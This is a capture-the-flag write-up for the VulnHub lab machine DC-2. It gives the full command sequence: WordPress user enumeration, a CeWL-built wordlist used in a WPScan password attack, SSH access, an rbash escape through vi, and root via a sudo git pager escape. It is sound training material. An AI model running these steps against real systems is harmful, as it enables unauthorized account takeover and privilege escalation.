Overview
DC-2 is a beginner-friendly VulnHub machine focused on WordPress enumeration, password attacks, restricted shell escape, and Linux privilege escalation.
The attack path was:
WordPress -> user enumeration -> CeWL wordlist -> WPScan password attack -> SSH as tom -> rbash escape -> su jerry -> sudo git -> root
Enumeration
I started by finding the target on the local network.
Network discovery: sudo netdiscover -r 192.168.56.0/24
After finding the IP, I scanned the machine with Nmap.
Nmap scan: nmap -sC -sV -oN nmap.txt <TARGET_IP>
The useful findings were:
| Service | Finding | Why it mattered |
|---|---|---|
| HTTP | Port 80 open | The website became the main target. |
| SSH | Port 7744 open | SSH was running on a non-standard port. |
| CMS | WordPress | This pointed the attack toward WordPress enumeration. |
| Hostname | dc-2 | The site needed a hostname entry to load correctly. |
The website needed the hostname to work, so I added it to /etc/hosts.
Hosts file: sudo nano /etc/hosts
Entry added: <TARGET_IP> dc-2
Then I opened the site at http://dc-2.
WordPress Enumeration
I used WPScan to enumerate users on the WordPress site.
User enumeration: wpscan --url http://dc-2 --enumerate u
The important users found were:
| User | Use in the attack path |
|---|---|
| admin | Found during enumeration, but not the main path I used. |
| tom | Used later for SSH access. |
| jerry | Used later for privilege escalation. |
Finding real usernames was important because I could use them later with a password list.
Creating a Wordlist
One of the hints pointed toward using the website content to create a custom wordlist.
I used CeWL to generate a password list from words found on the site.
CeWL wordlist: cewl http://dc-2 -w passwords.txt
This gave me a small custom wordlist that matched the target better than a random large list.
Password Attack
After getting usernames and creating the wordlist, I used WPScan to test the passwords.
Users file: users.txt
| File | Contents |
|---|---|
| users.txt | admin, tom, jerry |
WPScan password attack: wpscan --url http://dc-2 -U users.txt -P passwords.txt
This gave valid credentials for the users needed in the next steps.
SSH as tom
After getting credentials, I logged in through SSH as tom.
SSH login: ssh tom@<TARGET_IP> -p 7744
The shell was restricted with rbash, so normal commands and paths were limited.
Escaping rbash
I found that vi was available, so I used it to escape the restricted shell.
| Step | Command |
|---|---|
| Open vi | vi |
| Set shell | :set shell=/bin/bash |
| Spawn shell | :shell |
| Fix PATH | export PATH=/bin:/usr/bin:/usr/local/bin:$PATH |
After that, I had a more normal shell as tom.
Switching to jerry
Next, I switched to the jerry user using the credentials found earlier.
Switch user: su jerry
Then I confirmed the user.
User check: whoami
At this point, I was working as jerry.
Privilege Escalation
As jerry, I checked sudo permissions.
Sudo check: sudo -l
The important finding was that jerry could run git as root.
| User | Sudo permission | Why it mattered |
|---|---|---|
| jerry | /usr/bin/git as root |
git can open a pager, which can be abused to spawn a shell. |
I used git to open the pager.
Run git as root: sudo git -p help config
Inside the pager, I typed:
Pager escape: !/bin/bash
This spawned a root shell.
I confirmed root with whoami and id.
Final Flag
After getting root, I moved to the root directory and read the final flag.
Root folder: cd /root
Final flag: cat final-flag.txt
What I Learned
DC-2 was useful for practicing WordPress enumeration and basic Linux privilege escalation.
The most important parts were finding real usernames, creating a custom wordlist from the website, and noticing that SSH was running on a non-standard port.
The privilege escalation was also a good reminder that normal tools like vi and git can be dangerous when they are available in the wrong context.